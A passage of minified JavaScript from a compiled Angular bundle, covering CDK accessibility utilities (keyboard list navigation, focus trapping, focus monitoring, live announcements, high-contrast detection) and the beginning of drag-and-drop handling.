e=this._activeItem;this.updateActiveItem(a),this._activeItem!==e&&this.change.next(this._activeItemIndex)}onKeydown(a){const e=a.keyCode,n=["altKey","ctrlKey","metaKey","shiftKey"].every(r=>!a[r]||this._allowedModifierKeys.indexOf(r)>-1);switch(e){case 9:return void this.tabOut.next();case 40:if(this._vertical&&n){this.setNextItemActive();break}return;case 38:if(this._vertical&&n){this.setPreviousItemActive();break}return;case 39:if(this._horizontal&&n){"rtl"===this._horizontal?this.setPreviousItemActive():this.setNextItemActive();break}return;case 37:if(this._horizontal&&n){"rtl"===this._horizontal?this.setNextItemActive():this.setPreviousItemActive();break}return;case 36:if(this._homeAndEnd&&n){this.setFirstItemActive();break}return;case 35:if(this._homeAndEnd&&n){this.setLastItemActive();break}return;default:return void((n||es(a,"shiftKey"))&&(a.key&&1===a.key.length?this._letterKeyStream.next(a.key.toLocaleUpperCase()):(e>=65&&e<=90||e>=48&&e<=57)&&this._letterKeyStream.next(String.fromCharCode(e))))}this._pressedLetters=[],a.preventDefault()}get activeItemIndex(){return this._activeItemIndex}get activeItem(){return this._activeItem}isTyping(){return this._pressedLetters.length>0}setFirstItemActive(){this._setActiveItemByIndex(0,1)}setLastItemActive(){this._setActiveItemByIndex(this._items.length-1,-1)}setNextItemActive(){this._activeItemIndex<0?this.setFirstItemActive():this._setActiveItemByDelta(1)}setPreviousItemActive(){this._activeItemIndex<0&&this._wrap?this.setLastItemActive():this._setActiveItemByDelta(-1)}updateActiveItem(a){const e=this._getItemsArray(),i="number"==typeof a?a:e.indexOf(a),n=e[i];this._activeItem=null==n?null:n,this._activeItemIndex=i}_setActiveItemByDelta(a){this._wrap?this._setActiveInWrapMode(a):this._setActiveInDefaultMode(a)}_setActiveInWrapMode(a){const e=this._getItemsArray();for(let i=1;i<=e.length;i++){const n=(this._activeItemIndex+a*i+e.length)%e.length;if(!this._skipPredicateFn(e[n]))return void this.setActiveItem(n)}}_setActiveInDefaultMode(a){this._setActiveItemByIndex(this._activeItemIndex+a,a)}_setActiveItemByIndex(a,e){const i=this._getItemsArray();if(i[a]){for(;this._skipPredicateFn(i[a]);)if(!i[a+=e])return;this.setActiveItem(a)}}_getItemsArray(){return this._items instanceof Cd?this._items.toArray():this._items}}class Bz extends Vz{setActiveItem(a){this.activeItem&&this.activeItem.setInactiveStyles(),super.setActiveItem(a),this.activeItem&&this.activeItem.setActiveStyles()}}class L1 extends Vz{constructor(){super(...arguments),this._origin="program"}setFocusOrigin(a){return this._origin=a,this}setActiveItem(a){super.setActiveItem(a),this.activeItem&&this.activeItem.focus(this._origin)}}let Ky=(()=>{class t{constructor(e){this._platform=e}isDisabled(e){return e.hasAttribute("disabled")}isVisible(e){return function Qfe(t){return!!(t.offsetWidth||t.offsetHeight||"function"==typeof t.getClientRects&&t.getClientRects().length)}(e)&&"visible"===getComputedStyle(e).visibility}isTabbable(e){if(!this._platform.isBrowser)return!1;const i=function jfe(t){try{return t.frameElement}catch(a){return null}}(function tpe(t){return t.ownerDocument&&t.ownerDocument.defaultView||window}(e));if(i&&(-1===Uz(i)||!this.isVisible(i)))return!1;let n=e.nodeName.toLowerCase(),r=Uz(e);return e.hasAttribute("contenteditable")?-1!==r:!("iframe"===n||"object"===n||this._platform.WEBKIT&&this._platform.IOS&&!function Zfe(t){let a=t.nodeName.toLowerCase(),e="input"===a&&t.type;return"text"===e||"password"===e||"select"===a||"textarea"===a}(e))&&("audio"===n?!!e.hasAttribute("controls")&&-1!==r:"video"===n?-1!==r&&(null!==r||this._platform.FIREFOX||e.hasAttribute("controls")):e.tabIndex>=0)}isFocusable(e,i){return function epe(t){return!function Kfe(t){return function Yfe(t){return"input"==t.nodeName.toLowerCase()}(t)&&"hidden"==t.type}(t)&&(function $fe(t){let a=t.nodeName.toLowerCase();return"input"===a||"select"===a||"button"===a||"textarea"===a}(t)||function Xfe(t){return function Jfe(t){return"a"==t.nodeName.toLowerCase()}(t)&&t.hasAttribute("href")}(t)||t.hasAttribute("contenteditable")||Hz(t))}(e)&&!this.isDisabled(e)&&((null==i?void 0:i.ignoreVisibility)||this.isVisible(e))}}return t.\u0275fac=function(e){return new(e||t)(At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Hz(t){if(!t.hasAttribute("tabindex")||void 0===t.tabIndex)return!1;let a=t.getAttribute("tabindex");return!(!a||isNaN(parseInt(a,10)))}function Uz(t){if(!Hz(t))return null;const a=parseInt(t.getAttribute("tabindex")||"",10);return isNaN(a)?-1:a}class ipe{constructor(a,e,i,n,r=!1){this._element=a,this._checker=e,this._ngZone=i,this._document=n,this._hasAttached=!1,this.startAnchorListener=()=>this.focusLastTabbableElement(),this.endAnchorListener=()=>this.focusFirstTabbableElement(),this._enabled=!0,r||this.attachAnchors()}get enabled(){return this._enabled}set enabled(a){this._enabled=a,this._startAnchor&&this._endAnchor&&(this._toggleAnchorTabIndex(a,this._startAnchor),this._toggleAnchorTabIndex(a,this._endAnchor))}destroy(){const a=this._startAnchor,e=this._endAnchor;a&&(a.removeEventListener("focus",this.startAnchorListener),a.remove()),e&&(e.removeEventListener("focus",this.endAnchorListener),e.remove()),this._startAnchor=this._endAnchor=null,this._hasAttached=!1}attachAnchors(){return!!this._hasAttached||(this._ngZone.runOutsideAngular(()=>{this._startAnchor||(this._startAnchor=this._createAnchor(),this._startAnchor.addEventListener("focus",this.startAnchorListener)),this._endAnchor||(this._endAnchor=this._createAnchor(),this._endAnchor.addEventListener("focus",this.endAnchorListener))}),this._element.parentNode&&(this._element.parentNode.insertBefore(this._startAnchor,this._element),this._element.parentNode.insertBefore(this._endAnchor,this._element.nextSibling),this._hasAttached=!0),this._hasAttached)}focusInitialElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusInitialElement(a)))})}focusFirstTabbableElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusFirstTabbableElement(a)))})}focusLastTabbableElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusLastTabbableElement(a)))})}_getRegionBoundary(a){const e=this._element.querySelectorAll(`[cdk-focus-region-${a}], [cdkFocusRegion${a}], [cdk-focus-${a}]`);return"start"==a?e.length?e[0]:this._getFirstTabbableElement(this._element):e.length?e[e.length-1]:this._getLastTabbableElement(this._element)}focusInitialElement(a){const e=this._element.querySelector("[cdk-focus-initial], [cdkFocusInitial]");if(e){if(!this._checker.isFocusable(e)){const i=this._getFirstTabbableElement(e);return null==i||i.focus(a),!!i}return e.focus(a),!0}return this.focusFirstTabbableElement(a)}focusFirstTabbableElement(a){const e=this._getRegionBoundary("start");return e&&e.focus(a),!!e}focusLastTabbableElement(a){const e=this._getRegionBoundary("end");return e&&e.focus(a),!!e}hasAttached(){return this._hasAttached}_getFirstTabbableElement(a){if(this._checker.isFocusable(a)&&this._checker.isTabbable(a))return a;const e=a.children;for(let i=0;i<e.length;i++){const n=e[i].nodeType===this._document.ELEMENT_NODE?this._getFirstTabbableElement(e[i]):null;if(n)return n}return null}_getLastTabbableElement(a){if(this._checker.isFocusable(a)&&this._checker.isTabbable(a))return a;const e=a.children;for(let i=e.length-1;i>=0;i--){const n=e[i].nodeType===this._document.ELEMENT_NODE?this._getLastTabbableElement(e[i]):null;if(n)return n}return null}_createAnchor(){const a=this._document.createElement("div");return this._toggleAnchorTabIndex(this._enabled,a),a.classList.add("cdk-visually-hidden"),a.classList.add("cdk-focus-trap-anchor"),a.setAttribute("aria-hidden","true"),a}_toggleAnchorTabIndex(a,e){a?e.setAttribute("tabindex","0"):e.removeAttribute("tabindex")}toggleAnchors(a){this._startAnchor&&this._endAnchor&&(this._toggleAnchorTabIndex(a,this._startAnchor),this._toggleAnchorTabIndex(a,this._endAnchor))}_executeOnStable(a){this._ngZone.isStable?a():this._ngZone.onStable.pipe(Cn(1)).subscribe(a)}}let z3=(()=>{class t{constructor(e,i,n){this._checker=e,this._ngZone=i,this._document=n}create(e,i=!1){return new ipe(e,this._checker,this._ngZone,this._document,i)}}return t.\u0275fac=function(e){return new(e||t)(At(Ky),At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function W3(t){return 0===t.buttons||0===t.offsetX&&0===t.offsetY}function F3(t){const a=t.touches&&t.touches[0]||t.changedTouches&&t.changedTouches[0];return!(!a||-1!==a.identifier||null!=a.radiusX&&1!==a.radiusX||null!=a.radiusY&&1!==a.radiusY)}const ape=new ni("cdk-input-modality-detector-options"),npe={ignoreKeys:[18,17,224,91,16]},z1=ym({passive:!0,capture:!0});let ope=(()=>{class t{constructor(e,i,n,r){this._platform=e,this._mostRecentTarget=null,this._modality=new zs(null),this._lastTouchMs=0,this._onKeydown=c=>{var d,T;null!==(T=null===(d=this._options)||void 0===d?void 0:d.ignoreKeys)&&void 0!==T&&T.some(k=>k===c.keyCode)||(this._modality.next("keyboard"),this._mostRecentTarget=Id(c))},this._onMousedown=c=>{Date.now()-this._lastTouchMs<650||(this._modality.next(W3(c)?"keyboard":"mouse"),this._mostRecentTarget=Id(c))},this._onTouchstart=c=>{F3(c)?this._modality.next("keyboard"):(this._lastTouchMs=Date.now(),this._modality.next("touch"),this._mostRecentTarget=Id(c))},this._options=Object.assign(Object.assign({},npe),r),this.modalityDetected=this._modality.pipe(Sw(1)),this.modalityChanged=this.modalityDetected.pipe(Bh()),e.isBrowser&&i.runOutsideAngular(()=>{n.addEventListener("keydown",this._onKeydown,z1),n.addEventListener("mousedown",this._onMousedown,z1),n.addEventListener("touchstart",this._onTouchstart,z1)})}get mostRecentModality(){return this._modality.value}ngOnDestroy(){this._modality.complete(),this._platform.isBrowser&&(document.removeEventListener("keydown",this._onKeydown,z1),document.removeEventListener("mousedown",this._onMousedown,z1),document.removeEventListener("touchstart",this._onTouchstart,z1))}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(qi),At(ga),At(ape,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const rpe=new ni("liveAnnouncerElement",{providedIn:"root",factory:function spe(){return null}}),cpe=new ni("LIVE_ANNOUNCER_DEFAULT_OPTIONS");let Nw=(()=>{class t{constructor(e,i,n,r){this._ngZone=i,this._defaultOptions=r,this._document=n,this._liveElement=e||this._createLiveElement()}announce(e,...i){const n=this._defaultOptions;let r,c;return 1===i.length&&"number"==typeof i[0]?c=i[0]:[r,c]=i,this.clear(),clearTimeout(this._previousTimeout),r||(r=n&&n.politeness?n.politeness:"polite"),null==c&&n&&(c=n.duration),this._liveElement.setAttribute("aria-live",r),this._ngZone.runOutsideAngular(()=>(this._currentPromise||(this._currentPromise=new Promise(d=>this._currentResolve=d)),clearTimeout(this._previousTimeout),this._previousTimeout=setTimeout(()=>{this._liveElement.textContent=e,"number"==typeof c&&(this._previousTimeout=setTimeout(()=>this.clear(),c)),this._currentResolve(),this._currentPromise=this._currentResolve=void 0},100),this._currentPromise))}clear(){this._liveElement&&(this._liveElement.textContent="")}ngOnDestroy(){var e,i;clearTimeout(this._previousTimeout),null===(e=this._liveElement)||void 0===e||e.remove(),this._liveElement=null,null===(i=this._currentResolve)||void 0===i||i.call(this),this._currentPromise=this._currentResolve=void 0}_createLiveElement(){const e="cdk-live-announcer-element",i=this._document.getElementsByClassName(e),n=this._document.createElement("div");for(let r=0;r<i.length;r++)i[r].remove();return n.classList.add(e),n.classList.add("cdk-visually-hidden"),n.setAttribute("aria-atomic","true"),n.setAttribute("aria-live","polite"),this._document.body.appendChild(n),n}}return t.\u0275fac=function(e){return new(e||t)(At(rpe,8),At(qi),At(ga),At(cpe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const lpe=new ni("cdk-focus-monitor-default-options"),V3=ym({passive:!0,capture:!0});let js=(()=>{class t{constructor(e,i,n,r,c){this._ngZone=e,this._platform=i,this._inputModalityDetector=n,this._origin=null,this._windowFocused=!1,this._originFromTouchInteraction=!1,this._elementInfo=new Map,this._monitoredElementCount=0,this._rootNodeFocusListenerCount=new Map,this._windowFocusListener=()=>{this._windowFocused=!0,this._windowFocusTimeoutId=window.setTimeout(()=>this._windowFocused=!1)},this._stopInputModalityDetector=new J,this._rootNodeFocusAndBlurListener=d=>{for(let k=Id(d);k;k=k.parentElement)"focus"===d.type?this._onFocus(d,k):this._onBlur(d,k)},this._document=r,this._detectionMode=(null==c?void 0:c.detectionMode)||0}monitor(e,i=!1){const n=Gr(e);if(!this._platform.isBrowser||1!==n.nodeType)return Bi(null);const r=_3(n)||this._getDocument(),c=this._elementInfo.get(n);if(c)return i&&(c.checkChildren=!0),c.subject;const d={checkChildren:i,subject:new J,rootNode:r};return this._elementInfo.set(n,d),this._registerGlobalListeners(d),d.subject}stopMonitoring(e){const i=Gr(e),n=this._elementInfo.get(i);n&&(n.subject.complete(),this._setClasses(i),this._elementInfo.delete(i),this._removeGlobalListeners(n))}focusVia(e,i,n){const r=Gr(e);r===this._getDocument().activeElement?this._getClosestElementsInfo(r).forEach(([d,T])=>this._originChanged(d,i,T)):(this._setOrigin(i),"function"==typeof r.focus&&r.focus(n))}ngOnDestroy(){this._elementInfo.forEach((e,i)=>this.stopMonitoring(i))}_getDocument(){return this._document||document}_getWindow(){return this._getDocument().defaultView||window}_getFocusOrigin(e){return this._origin?this._originFromTouchInteraction?this._shouldBeAttributedToTouch(e)?"touch":"program":this._origin:this._windowFocused&&this._lastFocusOrigin?this._lastFocusOrigin:e&&this._isLastInteractionFromInputLabel(e)?"mouse":"program"}_shouldBeAttributedToTouch(e){return 1===this._detectionMode||!(null==e||!e.contains(this._inputModalityDetector._mostRecentTarget))}_setClasses(e,i){e.classList.toggle("cdk-focused",!!i),e.classList.toggle("cdk-touch-focused","touch"===i),e.classList.toggle("cdk-keyboard-focused","keyboard"===i),e.classList.toggle("cdk-mouse-focused","mouse"===i),e.classList.toggle("cdk-program-focused","program"===i)}_setOrigin(e,i=!1){this._ngZone.runOutsideAngular(()=>{this._origin=e,this._originFromTouchInteraction="touch"===e&&i,0===this._detectionMode&&(clearTimeout(this._originTimeoutId),this._originTimeoutId=setTimeout(()=>this._origin=null,this._originFromTouchInteraction?650:1))})}_onFocus(e,i){const n=this._elementInfo.get(i),r=Id(e);!n||!n.checkChildren&&i!==r||this._originChanged(i,this._getFocusOrigin(r),n)}_onBlur(e,i){const n=this._elementInfo.get(i);!n||n.checkChildren&&e.relatedTarget instanceof Node&&i.contains(e.relatedTarget)||(this._setClasses(i),this._emitOrigin(n,null))}_emitOrigin(e,i){e.subject.observers.length&&this._ngZone.run(()=>e.subject.next(i))}_registerGlobalListeners(e){if(!this._platform.isBrowser)return;const i=e.rootNode,n=this._rootNodeFocusListenerCount.get(i)||0;n||this._ngZone.runOutsideAngular(()=>{i.addEventListener("focus",this._rootNodeFocusAndBlurListener,V3),i.addEventListener("blur",this._rootNodeFocusAndBlurListener,V3)}),this._rootNodeFocusListenerCount.set(i,n+1),1==++this._monitoredElementCount&&(this._ngZone.runOutsideAngular(()=>{this._getWindow().addEventListener("focus",this._windowFocusListener)}),this._inputModalityDetector.modalityDetected.pipe(ea(this._stopInputModalityDetector)).subscribe(r=>{this._setOrigin(r,!0)}))}_removeGlobalListeners(e){const i=e.rootNode;if(this._rootNodeFocusListenerCount.has(i)){const n=this._rootNodeFocusListenerCount.get(i);n>1?this._rootNodeFocusListenerCount.set(i,n-1):(i.removeEventListener("focus",this._rootNodeFocusAndBlurListener,V3),i.removeEventListener("blur",this._rootNodeFocusAndBlurListener,V3),this._rootNodeFocusListenerCount.delete(i))}--this._monitoredElementCount||(this._getWindow().removeEventListener("focus",this._windowFocusListener),this._stopInputModalityDetector.next(),clearTimeout(this._windowFocusTimeoutId),clearTimeout(this._originTimeoutId))}_originChanged(e,i,n){this._setClasses(e,i),this._emitOrigin(n,i),this._lastFocusOrigin=i}_getClosestElementsInfo(e){const i=[];return this._elementInfo.forEach((n,r)=>{(r===e||n.checkChildren&&r.contains(e))&&i.push([r,n])}),i}_isLastInteractionFromInputLabel(e){const{_mostRecentTarget:i,mostRecentModality:n}=this._inputModalityDetector;if("mouse"!==n||!i||i===e||"INPUT"!==e.nodeName&&"TEXTAREA"!==e.nodeName||e.disabled)return!1;const r=e.labels;if(r)for(let c=0;c<r.length;c++)if(r[c].contains(i))return!0;return!1}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(cr),At(ope),At(ga,8),At(lpe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),dpe=(()=>{class t{constructor(e,i){this._elementRef=e,this._focusMonitor=i,this._focusOrigin=null,this.cdkFocusChange=new Tt}get focusOrigin(){return this._focusOrigin}ngAfterViewInit(){const e=this._elementRef.nativeElement;this._monitorSubscription=this._focusMonitor.monitor(e,1===e.nodeType&&e.hasAttribute("cdkMonitorSubtreeFocus")).subscribe(i=>{this._focusOrigin=i,this.cdkFocusChange.emit(i)})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._monitorSubscription&&this._monitorSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js))},t.\u0275dir=Ot({type:t,selectors:[["","cdkMonitorElementFocus",""],["","cdkMonitorSubtreeFocus",""]],outputs:{cdkFocusChange:"cdkFocusChange"},exportAs:["cdkMonitorFocus"]}),t})();const Gz="cdk-high-contrast-black-on-white",jz="cdk-high-contrast-white-on-black",Lw="cdk-high-contrast-active";let Qz=(()=>{class t{constructor(e,i){this._platform=e,this._document=i,this._breakpointSubscription=Po(O3).observe("(forced-colors: active)").subscribe(()=>{this._hasCheckedHighContrastMode&&(this._hasCheckedHighContrastMode=!1,this._applyBodyHighContrastModeCssClasses())})}getHighContrastMode(){if(!this._platform.isBrowser)return 0;const e=this._document.createElement("div");e.style.backgroundColor="rgb(1,2,3)",e.style.position="absolute",this._document.body.appendChild(e);const i=this._document.defaultView||window,n=i&&i.getComputedStyle?i.getComputedStyle(e):null,r=(n&&n.backgroundColor||"").replace(/ /g,"");switch(e.remove(),r){case"rgb(0,0,0)":case"rgb(45,50,54)":case"rgb(32,32,32)":return 2;case"rgb(255,255,255)":case"rgb(255,250,239)":return 1}return 0}ngOnDestroy(){this._breakpointSubscription.unsubscribe()}_applyBodyHighContrastModeCssClasses(){if(!this._hasCheckedHighContrastMode&&this._platform.isBrowser&&this._document.body){const e=this._document.body.classList;e.remove(Lw,Gz,jz),this._hasCheckedHighContrastMode=!0;const i=this.getHighContrastMode();1===i?e.add(Lw,Gz):2===i&&e.add(Lw,jz)}}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Xy=(()=>{class t{constructor(e){e._applyBodyHighContrastModeCssClasses()}}return t.\u0275fac=function(e){return new(e||t)(At(Qz))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[$y]}),t})();function $z(t=0,a=Vy){return t<0&&(t=0),M3(t,t,a)}function zw(t,a,e){for(let i in a)if(a.hasOwnProperty(i)){const n=a[i];n?t.setProperty(i,n,null!=e&&e.has(i)?"important":""):t.removeProperty(i)}return t}function W1(t,a){const e=a?"":"none";zw(t.style,{"touch-action":a?"":"none","-webkit-user-drag":a?"":"none","-webkit-tap-highlight-color":a?"":"transparent","user-select":e,"-ms-user-select":e,"-webkit-user-select":e,"-moz-user-select":e})}function Kz(t,a,e){zw(t.style,{position:a?"":"fixed",top:a?"":"0",opacity:a?"":"0",left:a?"":"-999em"},e)}function B3(t,a){return a&&"none"!=a?t+" "+a:t}function Xz(t){const a=t.toLowerCase().indexOf("ms")>-1?1:1e3;return parseFloat(t)*a}function Ww(t,a){return t.getPropertyValue(a).split(",").map(i=>i.trim())}function Fw(t){const a=t.getBoundingClientRect();return{top:a.top,right:a.right,bottom:a.bottom,left:a.left,width:a.width,height:a.height,x:a.x,y:a.y}}function Vw(t,a,e){const{top:i,bottom:n,left:r,right:c}=t;return e>=i&&e<=n&&a>=r&&a<=c}function Yy(t,a,e){t.top+=a,t.bottom=t.top+t.height,t.left+=e,t.right=t.left+t.width}function Yz(t,a,e,i){const{top:n,right:r,bottom:c,left:d,width:T,height:k}=t,q=T*a,Y=k*a;return i>n-Y&&i<c+Y&&e>d-q&&e<r+q}class Jz{constructor(a){this._document=a,this.positions=new Map}clear(){this.positions.clear()}cache(a){this.clear(),this.positions.set(this._document,{scrollPosition:this.getViewportScrollPosition()}),a.forEach(e=>{this.positions.set(e,{scrollPosition:{top:e.scrollTop,left:e.scrollLeft},clientRect:Fw(e)})})}handleScroll(a){const e=Id(a),i=this.positions.get(e);if(!i)return null;const n=i.scrollPosition;let r,c;if(e===this._document){const k=this.getViewportScrollPosition();r=k.top,c=k.left}else r=e.scrollTop,c=e.scrollLeft;const d=n.top-r,T=n.left-c;return this.positions.forEach((k,q)=>{k.clientRect&&e!==q&&e.contains(q)&&Yy(k.clientRect,d,T)}),n.top=r,n.left=c,{top:d,left:T}}getViewportScrollPosition(){return{top:window.scrollY,left:window.scrollX}}}function Zz(t){const a=t.cloneNode(!0),e=a.querySelectorAll("[id]"),i=t.nodeName.toLowerCase();a.removeAttribute("id");for(let n=0;n<e.length;n++)e[n].removeAttribute("id");return"canvas"===i?iW(t,a):("input"===i||"select"===i||"textarea"===i)&&tW(t,a),eW("canvas",t,a,iW),eW("input, textarea, select",t,a,tW),a}function eW(t,a,e,i){const n=a.querySelectorAll(t);if(n.length){const r=e.querySelectorAll(t);for(let c=0;c<n.length;c++)i(n[c],r[c])}}let upe=0;function tW(t,a){"file"!==a.type&&(a.value=t.value),"radio"===a.type&&a.name&&(a.name=`mat-clone-${a.name}-${upe++}`)}function iW(t,a){const e=a.getContext("2d");if(e)try{e.drawImage(t,0,0)}catch(i){}}const aW=ym({passive:!0}),H3=ym({passive:!1}),Bw=new Set(["position"]);class fpe{constructor(a,e,i,n,r,c){this._config=e,this._document=i,this._ngZone=n,this._viewportRuler=r,this._dragDropRegistry=c,this._passiveTransform={x:0,y:0},this._activeTransform={x:0,y:0},this._hasStartedDragging=!1,this._moveEvents=new J,this._pointerMoveSubscription=I.EMPTY,this._pointerUpSubscription=I.EMPTY,this._scrollSubscription=I.EMPTY,this._resizeSubscription=I.EMPTY,this._boundaryElement=null,this._nativeInteractionsEnabled=!0,this._handles=[],this._disabledHandles=new Set,this._direction="ltr",this.dragStartDelay=0,this._disabled=!1,this.beforeStarted=new J,this.started=new J,this.released=new J,this.ended=new J,this.entered=new J,this.exited=new J,this.dropped=new J,this.moved=this._moveEvents,this._pointerDown=d=>{if(this.beforeStarted.next(),this._handles.length){const T=this._getTargetHandle(d);T&&!this._disabledHandles.has(T)&&!this.disabled&&this._initializeDragSequence(T,d)}else this.disabled||this._initializeDragSequence(this._rootElement,d)},this._pointerMove=d=>{const T=this._getPointerPositionOnPage(d);if(!this._hasStartedDragging){if(Math.abs(T.x-this._pickupPositionOnPage.x)+Math.abs(T.y-this._pickupPositionOnPage.y)>=this._config.dragStartThreshold){const pe=Date.now()>=this._dragStartTime+this._getDragStartDelay(d),Re=this._dropContainer;if(!pe)return void this._endDragSequence(d);(!Re||!Re.isDragging()&&!Re.isReceiving())&&(d.preventDefault(),this._hasStartedDragging=!0,this._ngZone.run(()=>this._startDragSequence(d)))}return}d.preventDefault();const k=this._getConstrainedPointerPosition(T);if(this._hasMoved=!0,this._lastKnownPointerPosition=T,this._updatePointerDirectionDelta(k),this._dropContainer)this._updateActiveDropContainer(k,T);else{const q=this.constrainPosition?this._initialClientRect:this._pickupPositionOnPage,Y=this._activeTransform;Y.x=k.x-q.x+this._passiveTransform.x,Y.y=k.y-q.y+this._passiveTransform.y,this._applyRootElementTransform(Y.x,Y.y)}this._moveEvents.observers.length&&this._ngZone.run(()=>{this._moveEvents.next({source:this,pointerPosition:k,event:d,distance:this._getDragDistance(k),delta:this._pointerDirectionDelta})})},this._pointerUp=d=>{this._endDragSequence(d)},this._nativeDragStart=d=>{if(this._handles.length){const T=this._getTargetHandle(d);T&&!this._disabledHandles.has(T)&&!this.disabled&&d.preventDefault()}else this.disabled||d.preventDefault()},this.withRootElement(a).withParent(e.parentDragRef||null),this._parentPositions=new Jz(i),c.registerDragItem(this)}get disabled(){return this._disabled||!(!this._dropContainer||!this._dropContainer.disabled)}set disabled(a){const e=wi(a);e!==this._disabled&&(this._disabled=e,this._toggleNativeDragInteractions(),this._handles.forEach(i=>W1(i,e)))}getPlaceholderElement(){return this._placeholder}getRootElement(){return this._rootElement}getVisibleElement(){return this.isDragging()?this.getPlaceholderElement():this.getRootElement()}withHandles(a){this._handles=a.map(i=>Gr(i)),this._handles.forEach(i=>W1(i,this.disabled)),this._toggleNativeDragInteractions();const e=new Set;return this._disabledHandles.forEach(i=>{this._handles.indexOf(i)>-1&&e.add(i)}),this._disabledHandles=e,this}withPreviewTemplate(a){return this._previewTemplate=a,this}withPlaceholderTemplate(a){return this._placeholderTemplate=a,this}withRootElement(a){const e=Gr(a);return e!==this._rootElement&&(this._rootElement&&this._removeRootElementListeners(this._rootElement),this._ngZone.runOutsideAngular(()=>{e.addEventListener("mousedown",this._pointerDown,H3),e.addEventListener("touchstart",this._pointerDown,aW),e.addEventListener("dragstart",this._nativeDragStart,H3)}),this._initialTransform=void 0,this._rootElement=e),"undefined"!=typeof SVGElement&&this._rootElement instanceof SVGElement&&(this._ownerSVGElement=this._rootElement.ownerSVGElement),this}withBoundaryElement(a){return this._boundaryElement=a?Gr(a):null,this._resizeSubscription.unsubscribe(),a&&(this._resizeSubscription=this._viewportRuler.change(10).subscribe(()=>this._containInsideBoundaryOnResize())),this}withParent(a){return this._parentDragRef=a,this}dispose(){var a,e;this._removeRootElementListeners(this._rootElement),this.isDragging()&&(null===(a=this._rootElement)||void 0===a||a.remove()),null===(e=this._anchor)||void 0===e||e.remove(),this._destroyPreview(),this._destroyPlaceholder(),this._dragDropRegistry.removeDragItem(this),this._removeSubscriptions(),this.beforeStarted.complete(),this.started.complete(),this.released.complete(),this.ended.complete(),this.entered.complete(),this.exited.complete(),this.dropped.complete(),this._moveEvents.complete(),this._handles=[],this._disabledHandles.clear(),this._dropContainer=void 0,this._resizeSubscription.unsubscribe(),this._parentPositions.clear(),this._boundaryElement=this._rootElement=this._ownerSVGElement=this._placeholderTemplate=this._previewTemplate=this._anchor=this._parentDragRef=null}isDragging(){return this._hasStartedDragging&&this._dragDropRegistry.isDragging(this)}reset(){this._rootElement.style.transform=this._initialTransform||"",this._activeTransform={x:0,y:0},this._passiveTransform={x:0,y:0}}disableHandle(a){!this._disabledHandles.has(a)&&this._handles.indexOf(a)>-1&&(this._disabledHandles.add(a),W1(a,!0))}enableHandle(a){this._disabledHandles.has(a)&&(this._disabledHandles.delete(a),W1(a,this.disabled))}withDirection(a){return this._direction=a,this}_withDropContainer(a){this._dropContainer=a}getFreeDragPosition(){const a=this.isDragging()?this._activeTransform:this._passiveTransform;return{x:a.x,y:a.y}}setFreeDragPosition(a){return this._activeTransform={x:0,y:0},this._passiveTransform.x=a.x,this._passiveTransform.y=a.y,this._dropContainer||this._applyRootElementTransform(a.x,a.y),this}withPreviewContainer(a){return this._previewContainer=a,this}_sortFromLastPointerPosition(){const a=this._lastKnownPointerPosition;a&&this._dropContainer&&this._updateActiveDropContainer(this._getConstrainedPointerPosition(a),a)}_removeSubscriptions(){this._pointerMoveSubscription.unsubscribe(),this._pointerUpSubscription.unsubscribe(),this._scrollSubscription.unsubscribe()}_destroyPreview(){var a,e;null===(a=this._preview)||void 0===a||a.remove(),null===(e=this._previewRef)||void 0===e||e.destroy(),this._preview=this._previewRef=null}_destroyPlaceholder(){var a,e;null===(a=this._placeholder)||void 0===a||a.remove(),null===(e=this._placeholderRef)||void 0===e||e.destroy(),this._placeholder=this._placeholderRef=null}_endDragSequence(a){if(this._dragDropRegistry.isDragging(this)&&(this._removeSubscriptions(),this._dragDropRegistry.stopDragging(this),this._toggleNativeDragInteractions(),this._handles&&(this._rootElement.style.webkitTapHighlightColor=this._rootElementTapHighlight),this._hasStartedDragging))if(this.released.next({source:this,event:a}),this._dropContainer)this._dropContainer._stopScrolling(),this._animatePreviewToPlaceholder().then(()=>{this._cleanupDragArtifacts(a),this._cleanupCachedDimensions(),this._dragDropRegistry.stopDragging(this)});else{this._passiveTransform.x=this._activeTransform.x;const e=this._getPointerPositionOnPage(a);this._passiveTransform.y=this._activeTransform.y,this._ngZone.run(()=>{this.ended.next({source:this,distance:this._getDragDistance(e),dropPoint:e,event:a})}),this._cleanupCachedDimensions(),this._dragDropRegistry.stopDragging(this)}}_startDragSequence(a){Jy(a)&&(this._lastTouchEventTime=Date.now()),this._toggleNativeDragInteractions();const e=this._dropContainer;if(e){const i=this._rootElement,n=i.parentNode,r=this._placeholder=this._createPlaceholderElement(),c=this._anchor=this._anchor||this._document.createComment(""),d=this._getShadowRoot();n.insertBefore(c,i),this._initialTransform=i.style.transform||"",this._preview=this._createPreviewElement(),Kz(i,!1,Bw),this._document.body.appendChild(n.replaceChild(r,i)),this._getPreviewInsertionPoint(n,d).appendChild(this._preview),this.started.next({source:this,event:a}),e.start(),this._initialContainer=e,this._initialIndex=e.getItemIndex(this)}else this.started.next({source:this,event:a}),this._initialContainer=this._initialIndex=void 0;this._parentPositions.cache(e?e.getScrollableParents():[])}_initializeDragSequence(a,e){this._parentDragRef&&e.stopPropagation();const i=this.isDragging(),n=Jy(e),r=!n&&0!==e.button,c=this._rootElement,d=Id(e),T=!n&&this._lastTouchEventTime&&this._lastTouchEventTime+800>Date.now(),k=n?F3(e):W3(e);if(d&&d.draggable&&"mousedown"===e.type&&e.preventDefault(),i||r||T||k)return;if(this._handles.length){const 